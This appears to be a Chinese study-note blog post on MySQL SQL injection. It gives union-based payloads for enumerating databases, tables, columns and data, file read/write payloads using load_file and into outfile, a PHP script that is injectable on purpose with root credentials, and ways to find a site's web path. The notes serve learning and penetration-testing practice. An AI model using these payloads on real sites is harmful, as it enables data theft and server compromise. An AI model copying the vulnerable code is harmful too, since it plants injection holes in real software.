mysql数据库结构:

  数据库A  --> 表名  --> 列名 --> 数据

  数据库B  --> 表名  --> 列名 --> 数据

mysql数据库信息:

  mysql 5.0以上自带数据库:information_schema

  information_schema.schemata: 数据库下的schemata库名,含义:存储所有数据库下的库名信息的表。

  information_schema.tables: 数据库下的tables表名,含义:存储所有数据库下的表名信息的表。

  information_schema.columns: 数据库下的columns表名,含义:存储所有数据库下的列名信息的表。

  database():数据库名

  user():数据库用户

  version():数据库版本

  @@version_compile_os:操作系统 

  schema_name:库名

  table_name:表名

  column_name:列名

mysql注入过程:

  (1) 判断注入点:  ?id=1 and 1=1 ;? id=1 and 1=2

  (2) 判断长度: ?id=1 order by 3

  (3) 获取基本信息: @@version_compile_os , version()  , database()  , user()

  (4) 获取库名: ?id=1 union select table_schema,2,3 from information_schema.schemata

  (5) 获取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 库名[16进制]

  (6) 获取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 库名[16进制]

         and table_name = 表名[16进制]

  (7) 获取数据: ?id=1 union select 列名[16进制],列名[16进制],3 from 表名[16进制]

mysql文件读写操作:

  (1) 读取操作:

      ?id=1 union select load_file('d:/123.txt'),2,3

  (2) 写入操作:

      ?id=1 union select '123',2,3 into outfile 'd:/123.txt'

  注意: 路径问题:

        使用"/"或者"\\" ; 原因[编程中"\"多半是转义]

      编码问题:

        数据中有单引号,将数据编码16进制即可

连接mysql数据库语句:

  <?php
  header("content-type:text/html;charset=utf8");
  $id=$_GET['x'];
  $conn=mysql_connect("127.0.0.1","root","root");
  mysql_select_db("sql",$conn);
  $sql = "select * from php where id=$id";
  $result=mysql_query($sql);
  while($row=mysql_fetch_array($result)){
  echo "<br>"."编号".$row['id']."<br>";
  echo "<br>"."用户".$row['user']."<br>";
  echo "<br>"."密码".$row['password']."<br>";
  }
  mysql_close($conn);
  echo "<br>"."当前执行的sql语句:".$sql;
  ?>

网站路径获取方法

  (1) 遗留文件:

      一般在网站根目录下,命名有php.php info.php phpinfo.php,test.php php_info.php等。

  (2) 报错显示

  (3)漏洞爆路径

  (4) 读取搭建平台配置文件

  (5)社工(字典猜解,谷歌黑客等)

      D:/www/ ; D:/wwwroot/ ; D:/web/ 等

sql注入--mysql的更多相关文章

  1. SQL 注入~MySQL专题

    Recently, 团队在做一个关于SQL的项目,这个专题是项目中的一部分,该部分正是由我来负责的.今天,分享给正在奋斗中的伙伴们,愿,你们在以后的学习道路中能有自己的收获.              ...

  2. c# 登录 防止sql注入 mysql数据库

    利用参数化 防止SQL注入 public string serachName(string name) { string result = ""; try { conn.Open( ...

  3. sql注入mysql注入

    #跨库查询及应用思路 information_schema表特性,记录数据库名.表名.列名对应表 information_schema.schemata:存储所有数据库名 schema_name:数据 ...

  4. sql注入的基本防范手段

    基本的sql注入防御手段,概括来讲就是权限控制和关键词过滤. 防御sql注入 ============================================================= ...

  5. web安全—sql注入漏洞

    SQL注入-mysql注入 一.普通的mysql注入 MySQL注入不像注入access数据库那样,不需要猜.从mysql5.0以上的版本,出现一个虚拟的数据库,即:information_schem ...

  6. pymysql 解决 sql 注入问题

    1. SQL 注入 SQL 注入是非常常见的一种网络攻击方式,主要是通过参数来让 mysql 执行 sql 语句时进行预期之外的操作. 即:因为传入的参数改变SQL的语义,变成了其他命令,从而操作了数 ...

  7. 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注

    前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...

  8. 渗透测试初学者的靶场实战 3--墨者学院SQL注入—宽字节盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

  9. 渗透测试初学者的靶场实战 2--墨者学院SQL注入—报错盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

随机推荐

  1. 【一个小功能】从js判断ie版本,浅谈navigator对象的appName属性

    判断IE版本主要的是获取两个属性,a.当前浏览器名称,b.当前浏览器版本,为此不得不了解navigator对象. 先贴代码 window.onload = function() { var brows ...

  2. 【learning】多项式开根详解+模板

    概述 多项式开跟是一个非常重要的知识点,许多多项式题目都要用到这一算法. 用快速数论变换,多项式求逆元和倍增法可以在$O(n log n)$的时间复杂度下求出一个$n$次多项式的开根. 前置技能 快速 ...

  3. UIKit框架之NSObject

    首先学习NSObject // // ViewController.m // localization // // Created by City--Online on 15/5/15. // Cop ...

  4. ASP.NET MVC显示异常信息

    开发ASP.NET多了,它的异常信息显示也习惯了.但在ASP.NET MVC中,却是另外一番情形. 以前只习惯使用IE浏览器,现在开发ASP.NET MVC程序,为了捕获到异常信息,Firefox的f ...

  5. t3用户-角色-权限hibernate经典配置

    用户-角色-权限hibernate经典配置. 既然有人问起,我就写下说明吧.在文章中间的配置文件那里.权当回忆一下,也帮助更多人.这是以前学校时写的,没有注释.都是贴的代码笔记.看到的莫要见怪.欢迎学 ...

  6. sqlserver设计器实现约束

    一.约束类型简介 二.创建数据表 三.创建主键约束和非空约束 四.创建唯一约束 选中任一列,右键--索引/键 点击 添加 生成IX_Employees*, 类型设置为 “唯一键”, 然后选择要约束的列 ...

  7. Java多线程--JDK并发包(2)

    Java多线程--JDK并发包(2) 线程池 在使用线程池后,创建线程变成了从线程池里获得空闲线程,关闭线程变成了将线程归坏给线程池. JDK有一套Executor框架,大概包括Executor.Ex ...

  8. 【Java并发编程】3、DelayQueue应用场景,多考生考试

    该场景来自于:http://www.cnblogs.com/sunzhenchao/p/3515085.html. 模拟一个考试的日子,考试时间为120分钟,30分钟后才可交卷,当时间到了,或学生都交 ...

  9. Codeforces343D(SummerTrainingDay06-F dfs序+线段树)

    D. Water Tree time limit per test:4 seconds memory limit per test:256 megabytes input:standard input ...

  10. POJ2478(SummerTrainingDay04-E 欧拉函数)

    Farey Sequence Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 16927   Accepted: 6764 D ...